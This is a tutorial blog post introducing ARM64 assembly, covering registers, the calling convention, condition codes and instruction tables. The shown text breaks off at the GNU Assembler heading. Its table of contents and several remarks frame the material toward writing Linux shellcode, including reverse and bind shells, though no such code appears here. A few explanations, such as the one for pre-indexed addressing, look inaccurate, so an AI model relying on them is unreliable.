This post is an introduction to ARM64 assembly and will not cover any advanced topics. It will be updated periodically as I learn more, and if you have suggestions on how to improve the content, or you believe something needs correcting, feel free to email me.

If you just want the code shown in this post, look here.

Please refer to the ARM Architecture Reference Manual ARMv8, for ARMv8-A architecture profile for more comprehensive information about the ARMv8-A architecture. Everything I discuss with exception to the source code and GNU topics can be found in the manual.

Table of contents

  1. ARM Architecture
    1. Profiles
    2. Operating Systems
    3. Registers
    4. Calling Convention
    5. Condition Codes
    6. Data Types
    7. Data Alignment
  2. A64 instruction set
    1. Arithmetic
    2. Logical and Move
    3. Load, Store and Addressing Modes
    4. Conditional
    5. Bit Manipulation
    6. Branch
    7. System
    8. x86 and A64 comparison
  3. GNU Assembler
    1. GCC assembly
    2. Comments
    3. Preprocessor Directives
    4. Symbolic Constants
    5. Structures and Unions
    6. Operators
    7. Macros
    8. Conditional assembly
  4. GNU Debugger
    1. Layout
    2. Commands
  5. Common operations
    1. Saving registers.
    2. Copying registers.
    3. Initialize register to zero.
    4. Initialize register to one.
    5. Initialize register to -1.
    6. Test register for FALSE or 0.
    7. Test register for TRUE or 1.
    8. Test register for -1.
  6. Linux Shellcode
    1. System Calls
    2. Tracing
    3. Execute /bin/sh
    4. Execute /bin/sh -c
    5. Reverse connect /bin/sh
    6. Bind /bin/sh to port
    7. Synchronized shell
  7. Encryption
    1. AES-128
    2. KECCAK
    3. GIMLI
    4. XOODOO
    5. ASCON
    6. SPECK
    7. SIMECK
    8. CHASKEY
    9. XTEA
    10. NOEKEON
    11. CHAM
    12. LEA
    13. CHACHA
    14. PRESENT
    15. LIGHTMAC
  8. Summary

1. ARM Architecture

ARM is a family of Reduced Instruction Set Computer (RISC) architectures for computer processors that has become the predominant CPU for smartphones, tablets, and most of the IoT devices being sold today. It is not just consumer electronics that use ARM. The CPU can be found in medical devices, cars, aeroplanes, robots..it can be found in billions of devices. The popularity of ARM is due in part to the reduced cost of production and power-efficiency. ARM Holdings Inc. is a fabless semiconductor company, which means they do not manufacture hardware. The company designs processor cores and license their technology as Intellectual Property (IP) to other semiconductor companies like ATMEL, NXP, and Samsung.

In this tutorial, I’ll be programming on “orca”, a Raspberry Pi (RPI) 3 running 64-bit Debian Linux. This RPI comes with a Cortex-A53, that can support privileged code in both 32 and 64-bit mode. The Cortex-A53 CPU is an ARMv8-A 64-bit core that has backward compatibility with ARMv7-A so that it can run the A32 and T32 instruction sets. Here’s a screenshot of output from lscpu.

There are currently two execution states you should be aware of.

AArch32
32-bit, with support for the T32 (Thumb) and A32 (ARM) instruction sets.
AArch64
64-bit, with support for the A64 instruction set.

This post only focuses on the A64 instruction set.

1.1 Profiles

There are three available, each one designed for a specific purpose. If you want to write shellcode, it’s safe to assume you’ll work primarily with the A series because it’s the only profile that supports a General Purpose Operating System (GPOS) such as Linux or Windows. A Real-Time Operating System (RTOS) is more likely to be found running on the R and M series.

Core Profile Application
A Application Supports a Virtual Memory System Architecture (VMSA) based on a Memory Management Unit (MMU).
Found in high performance devices that run an operating system such as Windows, Linux, Android or iOS.
R Real-time Found in medical devices, PLC, ECU, avionics, robotics. Where low latency and a high level of safety is required. For example, an electronic braking system in an automobile. Autonomous drones and Hunter Killers (HK).
M Microcontroller Supports a Protected Memory System Architecture (PMSA) based on a MMU. Found in ASICs, ASSPs, FPGAs, and SoCs for power management, I/O, touch screen, smart battery, and sensor controllers. Some drones use the M series. HK Aerial.

The vast majority of single-board computers run on the Cortex-A series because it has an MMU for translating virtual memory addresses to physical memory addresses required by most operating systems.

1.2 Operating Systems

An RTOS is time-critical whereas a GPOS isn’t. While I do not discuss writing code for an RTOS here, it’s important to know the difference because you’re not going to find Linux running on every ARM based device. Linux requires far too many resources to be suitable for a device with only 256KB of RAM. Certainly, Linux has a lot of support for peripheral devices, file-systems, dynamic loading of code, network connectivity, and user-interface support; all of this makes it ideal for internet connected handheld devices. However, you’re unlikely to find the same support in an RTOS because it is not a full OS in the sense that Linux is. An RTOS might only consist of a static library with support for task scheduling, Interprocess Communication (IPC), and synchronization.

Some RTOS such as QNX or VxWorks can be configured to support features normally found in a GPOS and it’s possible you will come across at least one of these in any vulnerability research. The following is a list of embedded operating systems you may wish to consider researching more about.

Open source

Proprietary

1.3 Registers

This post will only focus on using the general-purpose, zero and stack pointer registers, but not SIMD, floating point and vector registers. Most system calls only use general-purpose registers.

Name Size Description
Wn 32-bits General purpose registers 0-31
Xn 64-bits General purpose registers 0-31
WZR 32-bits Zero register
XZR 64-bits Zero register
SP 64-bits Stack pointer

W denotes 32-bit registers while X denotes 64-bit registers.

1.4 Calling convention

The following is applicable to Debian Linux. You may freely use x0-x18, but remember that if calling subroutines, they may use them as well.

Registers Description
X0 – X7 arguments and return value
X8 – X18 temporary registers
X19 – X28 callee-saved registers
X29 frame pointer
X30 link register
SP stack pointer

x0 – x7 are used to pass parameters and return values. The value of these registers may be freely modified by the called function (the callee) so the caller cannot assume anything about their content, even if they are not used in the parameter passing or for the returned value. This means that these registers are in practice caller-saved.

x8 – x18 are temporary registers for every function. No assumption can be made on their values upon returning from a function. In practice these registers are also caller-saved.

x19 – x28 are registers, that, if used by a function, must have their values preserved and later restored upon returning to the caller. These registers are known as callee-saved.

x29 can be used as a frame pointer and x30 is the link register. The callee should save x30if it intends to call a subroutine.

1.5 Condition Flags

ARM has a “process state” with condition flags that affect the behaviour of some instructions. Branch instructions can be used to change the flow of execution. Some of the data processing instructions allow setting the condition flags with the S suffix. e.g ANDS or ADDS. The flags are the Zero Flag (Z), the Carry Flag (C), the Negative Flag (N) and the is Overflow Flag (V).

Flag Description
N Bit 31. Set if the result of an operation is negative. Cleared if the result is positive or zero.
Z Bit 30. Set if the result of an operation is zero/equal. Cleared if non-zero/not equal.
C Bit 29. Set if an instruction results in a carry or overflow. Cleared if no carry.
V Bit 28. Set if an instruction results in an overflow. Cleared if no overflow.

1.6 Condition Codes

The A32 instruction set supports conditional execution for most of its operations. To improve performance, ARM removed support with A64. These conditional codes are now only effective with branch, select and compare instructions. This appears to be a disadvantage, but there are sufficient alternatives in the A64 set that are a distinct improvement.

Mnemonic Description Condition flags
EQ Equal Z set
NE Not Equal Z clear
CS or HS Carry Set C set
CC or LO Carry Clear C clear
MI Minus N set
PL Plus, positive or zero N clear
VS Overflow V set
VC No overflow V clear
HI Unsigned Higher than or equal C set and Z clear
LS Unsigned Less than or equal C clear or Z set
GE Signed Greater than or Equal N and V the same
LT Signed Less than N and V differ
GT Signed Greater than Z clear, N and V the same
LE Signed Less than or Equal Z set, N and V differ
AL Always. Normally omitted. Any

1.7 Data Types

A “word” on x86 is 16-bits and a “doubleword” is 32-bits. A “word” for ARM is 32-bits and a “doubleword” is 64-bits.

Type Size
Byte 8 bits
Half-word 16 bits
Word 32 bits
Doubleword 64 bits
Quadword 128 bits

1.8 Data Alignment

The alignment of sp must be two times the size of a pointer. For AArch32 that’s 8 bytes, and for AArch64 it’s 16 bytes.

2. A64 Instruction Set

Like all previous ARM architectures, ARMv8-A is a load/store architecture. Data processing instructions do not operate directly on data in memory as we find with the x86 architecture. The data is first loaded into registers, modified, and then stored back in memory or simply discarded once it’s no longer required. Most data processing instructions use one destination register and two source operands. The general format can be considered as the instruction, followed by the operands, as follows:

Instruction Rd, Rn, Operand2

Rd is the destination register. Rn is the register that is operated on. The use of R indicates that the registers can be either X or W registers. Operand2 might be a register, a modified register, or an immediate value.

2.1 Arithmetic

The following instructions can be used for arithmetic, stack allocation and addressing of memory, control flow, and initialization of registers or variables.

Menmonic Operands Instruction
ADD{S} (immediate) Rd, Rn, #imm{, shift} Add (immediate) adds a register value and an optionally-shifted immediate value, and writes the result to the destination register.
ADD{S} (extended register) Rd, Rn, Wm{, extend {#amount}} Add (extended register) adds a register value and a sign or zero-extended register value, followed by an optional left shift amount, and writes the result to the destination register. The argument that is extended from the Rm register can be a byte, halfword, word, or doubleword.
ADD{S} (shifted register) Rd, Rn, Rm{, shift #amount} Add (shifted register) adds a register value and an optionally-shifted register value, and writes the result to the destination register.
ADR Xd, rel Form PC-relative address adds an immediate value to the PC value to form a PC-relative address, and writes the result to the destination register.
ADRP Xd, rel Form PC-relative address to 4KB page adds an immediate value that is shifted left by 12 bits, to the PC value to form a PC-relative address, with the bottom 12 bits masked out, and writes the result to the destination register.
CMN (extended register) Rn, Rm{, extend {#amount}} Compare Negative (extended register) adds a register value and a sign or zero-extended register value, followed by an optional left shift amount. The argument that is extended from the Rm register can be a byte, halfword, word, or doubleword. It updates the condition flags based on the result, and discards the result.
CMN (immediate) Rn, #imm{, shift} Compare Negative (immediate) adds a register value and an optionally-shifted immediate value. It updates the condition flags based on the result, and discards the result.
CMN (shifted register) Rn, Rm{, shift #amount} Compare Negative (extended register) adds a register value and a sign or zero-extended register value, followed by an optional left shift amount. The argument that is extended from the Rm register can be a byte, halfword, word, or doubleword. It updates the condition flags based on the result, and discards the result.
CMP (extended register) Rn, Rm{, extend {#amount}} Compare (extended register) subtracts a sign or zero-extended register value, followed by an optional left shift amount, from a register value. The argument that is extended from the Rm register can be a byte, halfword, word, or doubleword. It updates the condition flags based on the result, and discards the result.
CMP (immediate) Rn, #imm{, shift} Compare (immediate) subtracts an optionally-shifted immediate value from a register value. It updates the condition flags based on the result, and discards the result.
CMP (shifted register) Rn, Rm{, shift #amount} Compare (shifted register) subtracts an optionally-shifted register value from a register value. It updates the condition flags based on the result, and discards the result.
MADD Rd, Rn, Rm, ra Multiply-Add multiplies two register values, adds a third register value, and writes the result to the destination register.
MNEG Rd, Rn, Rm Multiply-Negate multiplies two register values, negates the product, and writes the result to the destination register. Alias of MSUB.
MSUB Rd, Rn, Rm, ra Multiply-Subtract multiplies two register values, subtracts the product from a third register value, and writes the
result to the destination register.
MUL Rd, Rn, Rm Multiply. Alias of MADD.
NEG{S} Rd, op2 Negate (shifted register) negates an optionally-shifted register value, and writes the result to the destination register.
NGC{S} Rd, Rm Negate with Carry negates the sum of a register value and the value of NOT (Carry flag), and writes the result to the destination register.
SBC{S} Rd, Rn, Rm Subtract with Carry subtracts a register value and the value of NOT (Carry flag) from a register value, and writes the result to the destination register.
{U|S}DIV Rd, Rn, Rm Unsigned/Signed Divide divides a signed integer register value by another signed integer register value, and writes the result to the destination register. The condition flags are not affected.
{U|S}MADDL Xd, Wn, Wm, Xa Unsigned/Signed Multiply-Add Long multiplies two 32-bit register values, adds a 64-bit register value, and writes the result to the 64-bit destination register.
{U|S}MNEGL Xd, Wn, Wm Unsigned/Signed Multiply-Negate Long multiplies two 32-bit register values, negates the product, and writes the result to the 64-bit destination register.
{U|S}MSUBL Xd, Wn, Wm, Xa Unsigned/Signed Multiply-Subtract Long multiplies two 32-bit register values, subtracts the product from a 64-bit register value, and writes the result to the 64-bit destination register.
{U|S}MULH Xd, Xn, Xm Unsigned/Signed Multiply High multiplies two 64-bit register values, and writes bits[127:64] of the 128-bit result to the 64-bit destination register.
{U|S}MULL Xd, Wn, Wm Unsigned/Signed Multiply Long multiplies two 32-bit register values, and writes the result to the 64-bit destination register.
SUB{S} (extended register) Rd, Rn, Rm{, shift #amount} Subtract (extended register) subtracts a sign or zero-extended register value, followed by an optional left shift amount, from a register value, and writes the result to the destination register. The argument that is extended from the Rm register can be a byte, halfword, word, or doubleword.
SUB{S} (immediate) Rd, Rn, Rm{, shift #amount} Subtract (immediate) subtracts an optionally-shifted immediate value from a register value, and writes the result to the destination register.
SUB{S} (shift register) Rd, Rn, Rm{, shift #amount} Subtract (shifted register) subtracts an optionally-shifted register value from a register value, and writes the result to the destination register.
  // x0 == -1?
  cmn     x0, 1
  beq     minus_one

  // x0 == 0
  cmp     x0, 0
  beq     zero

  // allocate 32 bytes of stack
  sub     sp, sp, 32

  // x0 = x0 % 37
  mov     x1, 37
  udiv    x2, x0, x1
  msub    x0, x2, x1, x0

  // x0 = 0
  sub     x0, x0, x0

2.2 Logical and Move

Mainly used for bit testing and manipulation. To a large degree, cryptographic algorithms use these operations exclusively to be efficient in both hardware and software. Implementing bitwise operations in hardware is relatively cheap.

Mnemonic Operands Instruction
AND{S} (immediate) Rd, Rn, #imm Bitwise AND (immediate) performs a bitwise AND of a register value and an immediate value, and writes the result to the destination register.
AND{S} (shifted register) Rd, Rn, Rm, {shift #amount} Bitwise AND (shifted register) performs a bitwise AND of a register value and an optionally-shifted register value, and writes the result to the destination register.
ASR (register) Rd, Rn, Rm Arithmetic Shift Right (register) shifts a register value right by a variable number of bits, shifting in copies of its sign bit, and writes the result to the destination register. The remainder obtained by dividing the second source register by the data size defines the number of bits by which the first source register is right-shifted.
ASR (immediate) Rd, Rn, #imm Arithmetic Shift Right (immediate) shifts a register value right by an immediate number of bits, shifting in copies of the sign bit in the upper bits and zeros in the lower bits, and writes the result to the destination register.
BIC{S} Rd, Rn, Rm Bitwise Bit Clear (shifted register) performs a bitwise AND of a register value and the complement of an optionally-shifted register value, and writes the result to the destination register.
EON Rd, Rn, Rm {, shift amount} Bitwise Exclusive OR NOT (shifted register) performs a bitwise Exclusive OR NOT of a register value and an optionally-shifted register value, and writes the result to the destination register.
EOR Rd, Rn, #imm Bitwise Exclusive OR (immediate) performs a bitwise Exclusive OR of a register value and an immediate value, and writes the result to the destination register.
EOR Rd, Rn, Rm Bitwise Exclusive OR (shifted register) performs a bitwise Exclusive OR of a register value and an optionally-shifted register value, and writes the result to the destination register.
LSL (register) Rd, Rn, Rm Logical Shift Left (register) shifts a register value left by a variable number of bits, shifting in zeros, and writes the result to the destination register. The remainder obtained by dividing the second source register by the data size defines the number of bits by which the first source register is left-shifted. Alias of LSLV.
LSL (immediate) Rd, Rn, #imm Logical Shift Left (immediate) shifts a register value left by an immediate number of bits, shifting in zeros, and writes the result to the destination register. Alias of UBFM.
LSR (register) Rd, Rn, Rm Logical Shift Right (register) shifts a register value right by a variable number of bits, shifting in zeros, and writes the result to the destination register. The remainder obtained by dividing the second source register by the data size defines the number of bits by which the first source register is right-shifted.
LSR Rd, Rn, #imm Logical Shift Right (immediate) shifts a register value right by an immediate number of bits, shifting in zeros, and writes the result to the destination register.
MOV (register) Rd, Rn Move (register) copies the value in a source register to the destination register. Alias of ORR.
MOV (immediate) Rd, #imm Move (wide immediate) moves a 16-bit immediate value to a register. Alias of MOVZ.
MOVK Rd, #imm{, shift #amount} Move wide with keep moves an optionally-shifted 16-bit immediate value into a register, keeping other bits unchanged.
MOVN Rd, #imm{, shift #amount} Move wide with NOT moves the inverse of an optionally-shifted 16-bit immediate value to a register.
MOVZ Rd, #imm Move wide with zero moves an optionally-shifted 16-bit immediate value to a register.
MVN Rd, Rm{, shift #amount} Bitwise NOT writes the bitwise inverse of a register value to the destination register. Alias of ORN.
ORN Rd, Rn, Rm{, shift #amount} Bitwise OR NOT (shifted register) performs a bitwise (inclusive) OR of a register value and the complement of an optionally-shifted register value, and writes the result to the destination register.
ORR Rd, Rn, #imm Bitwise OR (immediate) performs a bitwise (inclusive) OR of a register value and an immediate register value, and writes the result to the destination register.
ORR Rd, Rn, Rm{, shift #amount} Bitwise OR (shifted register) performs a bitwise (inclusive) OR of a register value and an optionally-shifted register value, and writes the result to the destination register.
ROR Rd, Rs, #shift Rotate right (immediate) provides the value of the contents of a register rotated by a variable number of bits. The bits that are rotated off the right end are inserted into the vacated bit positions on the left. Alias of EXTR.
ROR Rd, Rn, Rm Rotate Right (register) provides the value of the contents of a register rotated by a variable number of bits. The bits that are rotated off the right end are inserted into the vacated bit positions on the left. The remainder obtained by dividing the second source register by the data size defines the number of bits by which the first source register is right-shifted. Alias of RORV.
TST Rn, #imm Test bits (immediate), setting the condition flags and discarding the result. Alias of ANDS.
TST Rn, Rm{, shift #amount} Test (shifted register) performs a bitwise AND operation on a register value and an optionally-shifted register value. It updates the condition flags based on the result, and discards the result. Alias of ANDS.

Multiplication can be performed using logical shift left LSL. Division can be performed using logical shift right LSR. Modulo operations can be performed using bitwise AND. The only condition is that the multiplier and divisor be a power of two. The first three examples shown here demonstrate those operations.

  // x1 = x0 / 8
  lsr     x1, x0, 3

  // x1 = x0 * 4
  lsl     x1, x0, 2

  // x1 = x0 % 16
  and     x1, x0, 15

  // x0 == 0?
  tst     x0, x0
  beq     zero

  // x0 = 0
  eor     x0, x0, x0

2.3 Load, Store and Addressing Modes

The following are the main instructions used for loading and storing data. There are others of course, designed for privileged/unprivileged loads, unscaled/unaligned loads, atomicity, and exclusive registers. However, as a beginner these are the only ones you need to worry about for now.

Mnemonic Operands Instruction
LDR (B|H|SB|SH|SW) Wt, [Xn|SP], #simm Load Register (immediate) loads a word or doubleword from memory and writes it to a register. The address that is used for the load is calculated from a base register and an immediate offset.
LDR (B|H|SB|SH|SW) Wt, [Xn|SP, (Wm|Xm){, extend {amount}}] Load Register (register) calculates an address from a base register value and an offset register value, loads a byte/half-word/word from memory, and writes it to a register. The offset register value can optionally be shifted and extended.
STR (B|H|SB|SH|SW) Wt, [Xn|SP], #simm Store Register (immediate) stores a word or a doubleword from a register to memory. The address that is used for the store is calculated from a base register and an immediate offset.
STR (B|H|SB|SH|SW) Wt, [Xn|SP, (Wm|Xm){, extend {amount}}] Store Register (immediate) stores a word or a doubleword from a register to memory. The address that is used for the store is calculated from a base register and an immediate offset.
LDP Wt1, Wt2, [Xn|SP], #imm Load Pair of Registers calculates an address from a base register value and an immediate offset, loads two 32-bit words or two 64-bit doublewords from memory, and writes them to two registers.
STP Wt1, Wt2, [Xn|SP], #imm Store Pair of Registers calculates an address from a base register value and an immediate offset, and stores two 32-bit words or two 64-bit doublewords to the calculated address, from two registers
  // load a byte from x1
  ldrb    w0, [x1]

  // load a signed byte from x1
  ldrsb   w0, [x1]

  // store a 32-bit word to address in x1
  str     w0, [x1]

  // load two 32-bit words from stack, advance sp by 8
  ldp     w0, w1, [sp], 8

  // store two 64-bit words at [sp-96] and subtract 96 from sp 
  stp     x0, x1, [sp, -96]!

  // load 32-bit immediate from literal pool
  ldr     w0, =0x12345678
Addressing Mode Immediate Register Extended Register
Base register only (no offset) [base{, 0}]
Base plus offset [base{, imm}] [base, Xm{, LSL imm}] [base, Wm, (S|U)XTW {#imm}]
Pre-indexed [base, imm]!
Post-indexed [base], imm [base], Xm a
Literal (PC-relative) label

Base register only

  // load a byte from x1
  ldrb   w0, [x1]

  // load a half-word from x1
  ldrh   w0, [x1]

  // load a word from x1
  ldr    w0, [x1]

  // load a doubleword from x1
  ldr    x0, [x1]

Base register plus offset

  // load a byte from x1 plus 1
  ldrb   w0, [x1, 1]

  // load a half-word from x1 plus 2
  ldrh   w0, [x1, 2]

  // load a word from x1 plus 4
  ldr    w0, [x1, 4]

  // load a doubleword from x1 plus 8
  ldr    x0, [x1, 8]

  // load a doubleword from x1 using x2 as index
  // w2 is multiplied by 8
  ldr    x0, [x1, x2, lsl 3]

  // load a doubleword from x1 using w2 as index
  // w2 is zero-extended and multiplied by 8
  ldr    x0, [x1, w2, uxtw 3]

Pre-index

The exclamation mark “!” implies adding the offset after the load or store.

  // load a byte from x1 plus 1, then advance x1 by 1
  ldrb   w0, [x1, 1]!

  // load a half-word from x1 plus 2, then advance x1 by 2
  ldrh   w0, [x1, 2]!

  // load a word from x1 plus 4, then advance x1 by 4
  ldr    w0, [x1, 4]!

  // load a doubleword from x1 plus 8, then advance x1 by 8
  ldr    x0, [x1, 8]!

Post-index

This mode accesses the value first and then adds the offset to base.

  // load a byte from x1, then advance x1 by 1
  ldrb   w0, [x1], 1

  // load a half-word from x1, then advance x1 by 2
  ldrh   w0, [x1], 2

  // load a word from x1, then advance x1 by 4
  ldr    w0, [x1], 4

  // load a doubleword from x1, then advance x1 by 8
  ldr    x0, [x1], 8

Literal (PC-relative)

These instructions work similar to RIP-relative addressing on AMD64.

  // load address of label
  adr    x0, label

  // load address of label
  adrp   x0, label

2.4 Conditional

These instructions select between the first or second source register, depending on the current state of the condition flags. When the named condition is true, the first source register is selected and its value is copied without modification to the destination register. When the condition is false the second source register is selected and its value might be optionally inverted, negated, or incremented by one, before writing to the destination register.

CSEL is essentially like the ternary operator in C. Probably my favorite instruction of ARM64 since it can be used to replace two or more opcodes.

Mnemonic Operands Instruction
CCMN (immediate) Rn, #imm, #nzcv, cond Conditional Compare Negative (immediate) sets the value of the condition flags to the result of the comparison of a register value and a negated immediate value if the condition is TRUE, and an immediate value otherwise.
CCMN (register) Rn, Rm, #nzcv, cond Conditional Compare Negative (register) sets the value of the condition flags to the result of the comparison of a register value and the inverse of another register value if the condition is TRUE, and an immediate value otherwise.
CCMP (immediate) Rn, #imm, #nzcv, cond Conditional Compare (immediate) sets the value of the condition flags to the result of the comparison of a register value and an immediate value if the condition is TRUE, and an immediate value otherwise.
CCMP (register) Rn, Rm, #nzcv, cond Conditional Compare (register) sets the value of the condition flags to the result of the comparison of two registers if the condition is TRUE, and an immediate value otherwise.
CSEL Rd, Rn, Rm, cond Conditional Select returns, in the destination register, the value of the first source register if the condition is TRUE, and otherwise returns the value of the second source register.
CSINC Rd, Rn, Rm, cond Conditional Select Increment returns, in the destination register, the value of the first source register if the condition is TRUE, and otherwise returns the value of the second source register incremented by 1. Used by CINC and CSET.
CSINV Rd, Rn, Rm, cond Conditional Select Invert returns, in the destination register, the value of the first source register if the condition is TRUE, and otherwise returns the bitwise inversion value of the second source register. Used by CINV and CSETM.
CSNEG Rd, Rn, Rm, cond Conditional Select Negation returns, in the destination register, the value of the first source register if the condition is TRUE, and otherwise returns the negated value of the second source register. Used by CNEG.
CSET Rd, cond Conditional Set sets the destination register to 1 if the condition is TRUE, and otherwise sets it to 0.
CSETM Rd, cond Conditional Set Mask sets all bits of the destination register to 1 if the condition is TRUE, and otherwise sets all bits to 0.
CINC Rd, Rn, cond Conditional Increment returns, in the destination register, the value of the source register incremented by 1 if the condition is TRUE, and otherwise returns the value of the source register.
CINV Rd, Rn, cond Conditional Invert returns, in the destination register, the bitwise inversion of the value of the source register if the condition is TRUE, and otherwise returns the value of the source register.
CNEG Rd, Rn, cond Conditional Negate returns, in the destination register, the negated value of the source register if the condition is TRUE, and otherwise returns the value of the source register.

Let’s consider the following if statement.

if (c == 0 && x == y) {
  // body of if statement
}

If the first condition evaulates to true (c equals zero), only then is the second condition evaluated. To implement the above statement in assembly, one could use the following.

    cmp    c, 0
    bne    false

    cmp    x, y
    bne    false
true:
    // body of if statement
false:
    // end of if statement

We could eliminate one instruction using conditional execution on ARMv7-A. Consider using the following instead.

    cmp    c, 0
    cmpeq  x, y
    bne    false

To improve performance of AArch64, ARM removed support for conditional execution and replaced it with specialised instructions such as the conditional compare instructions. Using ARMv8-A, the following can be used.

    cmp    c, 0
    ccmp   x, y, 0, eq
    bne    false

    // conditions are true:
false:

The ternary operator can be used for the same if statement.

bEqual = (c == 0) ? (x == y) : 0; 

If cmp c, 0 evaluates to true (ZF=1), ccmp x, y is evaluated, otherwise ZF is cleared using 0. Other conditions require different flags. Each flag is set using 1, 2, 4 or 8. Combine these values to set multiple flags. I’ve defined the flags below and also each condition required for a branch.

    .equ FLAG_V, 1
    .equ FLAG_C, 2
    .equ FLAG_Z, 4
    .equ FLAG_N, 8

    .equ NE, 0
    .equ EQ, FLAG_Z

    .equ GT, 0
    .equ GE, FLAG_Z

    .equ LT, (FLAG_N + FLAG_C)
    .equ LE, (FLAG_N + FLAG_Z + FLAG_C)

    .equ HI, (FLAG_N + FLAG_C)          // unsigned version of LT
    .equ HS, (FLAG_N + FLAG_Z + FLAG_C) // LE

    .equ LO, 0                        // unsigned version of GT
    .equ LS, FLAG_Z                   // GE

2.5 Bit Manipulation

Most of these instructions are intended to extract or move bits from one register to another. They tend to be useful when working with bytes or words where contents of the destination register needs to be preserved, zero or sign extended.

Mnemonic Operands Instruction
BFI Rd, Rn, #lsb, #width Bitfield Insert copies any number of low-order bits from a source register into the same number of adjacent bits at
any position in the destination register, leaving other bits unchanged.
BFM Rd, Rn, #immr, #imms Bitfield Move copies any number of low-order bits from a source register into the same number of adjacent bits at
any position in the destination register, leaving other bits unchanged.
BFXIL Rd, Rn, #lsb, #width Bitfield extract and insert at low end copies any number of low-order bits from a source register into the same
number of adjacent bits at the low end in the destination register, leaving other bits unchanged.
CLS Rd, Rn Count leading sign bits.
CLZ Rd, Rn Count leading zero bits.
EXTR Rd, Rn, Rm, #lsb Extract register extracts a register from a pair of registers.
RBIT Rd, Rn Reverse Bits reverses the bit order in a register.
REV16 Rd, Rn Reverse bytes in 16-bit halfwords reverses the byte order in each 16-bit halfword of a register.
REV32 Rd, Rn Reverse bytes in 32-bit words reverses the byte order in each 32-bit word of a register.
REV64 Rd, Rn Reverse Bytes reverses the byte order in a 64-bit general-purpose register.
SBFIZ Rd, Rn, #lsb, #width Signed Bitfield Insert in Zero zeroes the destination register and copies any number of contiguous bits from a source register into any position in the destination register, sign-extending the most significant bit of the transferred value. Alias of SBFM.
SBFM Wd, Wn, #immr, #imms Signed Bitfield Move copies any number of low-order bits from a source register into the same number of adjacent bits at any position in the destination register, shifting in copies of the sign bit in the upper bits and zeros in the lower bits.
SBFX Rd, Rn, #lsb, #width Signed Bitfield Extract extracts any number of adjacent bits at any position from a register, sign-extends them to the size of the register, and writes the result to the destination register.
{S,U}XT{B,H,W} Rd, Rn (S)igned/(U)nsigned eXtend (B)yte/(H)alfword/(W)ord extracts an 8-bit,16-bit or 32-bit value from a register, zero-extends it to the size of the register, and writes the result to the destination register. Alias of UBFM.
    // Move 0x12345678 into w0.
    mov     w0, 0x5678
    mov     w1, 0x1234
    bfi     w0, w1, 16, 16

    // Extract 8-bits from x1 into the x0 register at position 0.
    // If x1 is 0x12345678, 0x00000056 is placed in x0.
    ubfx    x0, x1, 8, 8

    // Extract 8-bits from x1 and insert with zeros into the x0 register at position 8.
    // If x1 is 0x12345678, 0x00005600 is placed in x0.
    ubfiz   x0, x1, 8, 8
    
    // Extract 8-bits from x1 and insert into x0 at position 0.
    // if x1 is 0x12345678 and x0 is 0x09ABCDEF. x0 after execution has 0x09ABCD78
    bfxil   x0, x1, 0, 8
    
    // Clear lower 8 bits.
    bfxil   x0, xzr, 0, 8

    // Zero-extend 8-bits
    uxtb    x0, x0

2.6 Branch

Branch instructions change the flow of execution using the condition flags or value of a general-purpose register. Branches are referred to as “jumps” in x86 assembly.

Mnemonic Operands Instruction
B label Branch causes an unconditional branch to a label at a PC-relative offset, with a hint that this is not a subroutine call or return.
B.cond label Branch conditionally to a label at a PC-relative offset, with a hint that this is not a subroutine call or return.
BL label Branch with Link branches to a PC-relative offset, setting the register X30 to PC+4. It provides a hint that this is a subroutine call.
BLR Xn Branch with Link to Register calls a subroutine at an address in a register, setting register X30 to PC+4.
BR Xn Branch to Register branches unconditionally to an address in a register, with a hint that this is not a subroutine return.
CBNZ Rn, label Compare and Branch on Nonzero compares the value in a register with zero, and conditionally branches to a label at a PC-relative offset if the comparison is not equal. It provides a hint that this is not a subroutine call or return. This instruction does not affect the condition flags.
CBZ Rn, label Compare and Branch on Zero compares the value in a register with zero, and conditionally branches to a label at a PC-relative offset if the comparison is equal. It provides a hint that this is not a subroutine call or return. This instruction does not affect condition flags.
RET Xn Return from subroutine branches unconditionally to an address in a register, with a hint that this is a subroutine return.
TBNZ Rn, #imm, label Test bit and Branch if Nonzero compares the value of a bit in a general-purpose register with zero, and conditionally branches to a label at a PC-relative offset if the comparison is not equal. It provides a hint that this is not a subroutine call or return. This instruction does not affect condition flags.
TBZ Rn, #imm, label Test bit and Branch if Zero compares the value of a test bit with zero, and conditionally branches to a label at a PC-relative offset if the comparison is equal. It provides a hint that this is not a subroutine call or return. This instruction does not affect condition flags.

Testing for TRUE or FALSE after calling a subroutine is so common, that it makes perfect sense to have conditional branch instructions such as TBZ/TBNZ and CBZ/CBNZ. The only instruction that comes close to these on x86 would be JCXZ that jumps if the value of the CX register is zero. However, x86 subroutines normally return results in the accumulator (AX) and the counter register (CX) is normally used for iterations/loops.

2.7 System

The main system instruction for shellcodes is the supervisor call SVC

Mnemonic Instruction
MSR Move general-purpose register to System Register allows the PE to write an AArch64 System register from a
general-purpose register.
MRS Move System Register allows the PE to read an AArch64 System register into a general-purpose register.
SVC Supervisor Call causes an exception to be taken to EL1.
NOP No Operation does nothing, other than advance the value of the program counter by 4. This instruction can be used
for instruction alignment purposes.

There’s a special-purpose register that allows you to read and write to the conditional flags called NZCV.

  // read the condition flags
  .equ OVERFLOW_FLAG, 1 << 28
  .equ CARRY_FLAG,    1 << 29
  .equ ZERO_FLAG,     1 << 30
  .equ NEGATIVE_FLAG, 1 << 31

  mrs    x0, nzcv

  // set the C flag
  mov    w0, CARRY_FLAG
  msr    nzcv, x0

2.8 x86 and A64 comparison

The following table lists x86 instructions and their equivalent for A64. It’s not a comprehensive list by any means. It’s mainly the more common instructions you’ll likely use or see in disassembled code. In some cases, x86 does not have an equivalent instruction and is therefore not included.

x86 Mnemonic A64 Mnemonic Instruction
MOVZX UXT Zero-Extend.
MOVSX SXT Sign-Extend.
BSWAP REV Reverse byte order.
SHR LSR Logical Shift Right.
SHL LSL Logical Shift Left.
XOR EOR Bitwise exclusive-OR.
OR ORR Bitwise OR.
NOT MVN Bitwise NOT.
SHRD EXTR Double precision shift right / Extract register from pair of registers.
SAR ASR Arithmetic Shift Right.
SBB SBC Subtract with Borrow / Subtract with Carry
TEST TST Perform a bitwise AND, set flags and discard result.
CALL BL Branch with Link / Call a subroutine.
JNE BNE Jump/Branch if Not Equal.
JS BMI Jump/Branch if Signed / Minus.
JG BGT Jump/Branch if Greater.
JGE BGE Jump/Branch if Greater or Equal.
JE BEQ Jump/Branch if Equal.
JC/JB BCS / BHS Jump/Branch if Carry / Borrow
JNC/JNB BCC / BLO Jump/Branch if No Carry / No Borrow
JAE BPL Jump if Above or Equal / Branch if Plus, positive or Zero.

3. GNU Assembler

